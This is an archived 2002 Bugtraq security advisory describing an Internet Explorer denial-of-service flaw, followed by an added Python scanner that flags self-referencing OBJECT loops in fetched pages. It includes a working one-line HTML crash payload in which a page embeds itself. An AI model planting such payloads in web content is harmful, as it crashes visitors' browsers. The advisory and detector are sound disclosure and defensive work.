[25197] in bugtraq


DoS in Multiple IE Versions (Self-Referenced Directives)

daemon@ATHENA.MIT.EDU (Matthew Murphy)
Sat Apr 20 16:31:45 2002

Message-ID: <000a01c1e882$da16bbc0$dd301c41@kc.rr.com>
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: <news@securiteam.com>, <bugtraq@securityfocus.com>
Date: Sat, 20 Apr 2002 10:48:43 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

The Flaw

    OBJECT elements are used for embedded OLE in HTML documents.  A flaw in
the way Microsoft Internet Explorer processes this directive allows a page
that causes a loop in object dependency, or loads itself in a certain manner
in an OBJECT, to completely crash Internet Explorer.

The Exploit

    To date, I have discovered 4 points of exploitation to crash the
browser.  My favorite example is this one:

---- [ CRASH.HTM ] ----
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
---- [ CRASH.HTM ] ----

IE dies inside shdocvw.dll with a call stack overflow.

Fixes

    Set "Run ActiveX Controls and Plugins" to disabled in ALL zones.  An XML
Island DSO may even be able to get past this, however.  I would expect this
bug to be fixed in a future IE service pack, though there's been no
confirmation/details of that from Microsoft.
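
A defensive check for the condition described in the message above, added here as an example and not part of the original post: a Python scan that a proxy or content filter could run over fetched pages to flag OBJECT elements whose DATA reference leads back to the embedding page, directly or through other pages. The function names, the example.test URLs and the case-insensitive URL comparison are assumptions of this example.

```python
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin

# Constructed sample pages (URL -> HTML); example.test is a placeholder host.
SAMPLE_PAGES = {
    "http://example.test/CRASH.HTM": '<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>',
    "http://example.test/a.htm": '<object data="b.htm" type="text/html"></object>',
    "http://example.test/b.htm": '<object data="/a.htm#top" type="text/html"></object>',
    "http://example.test/ok.htm": '<object data="clip.avi"></object>',
}

class ObjectDataParser(HTMLParser):
    """Collect the DATA attribute of every OBJECT element, whatever its TYPE."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        data = dict(attrs).get("data")  # HTMLParser lowercases tag and attribute names
        if tag == "object" and data:
            self.targets.append(data)

def normalize(base, ref=""):
    # Assumption: compare URLs case-insensitively and without fragments,
    # so CRASH.HTM and crash.htm count as the same document.
    return urldefrag(urljoin(base, ref)).url.lower()

def object_graph(pages):
    """Map each page URL to the set of URLs its OBJECT elements embed."""
    graph = {}
    for url, html in pages.items():
        parser = ObjectDataParser()
        parser.feed(html)
        graph[normalize(url)] = {normalize(url, t) for t in parser.targets}
    return graph

def find_object_loops(pages):
    """Return each embedding loop as a URL path that ends where it began."""
    graph, loops, done = object_graph(pages), [], set()
    def visit(node, path):
        if node in path:  # back edge: this page is already being embedded
            loops.append(path[path.index(node):] + [node])
        elif node in graph and node not in done:
            for target in sorted(graph[node]):
                visit(target, path + [node])
            done.add(node)
    for start in sorted(graph):
        visit(start, [])
    return loops
```

A page reported here can be blocked or have its OBJECT element stripped before it reaches the browser; targets that were never fetched are not followed, so the scan only sees loops among the pages it is given.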

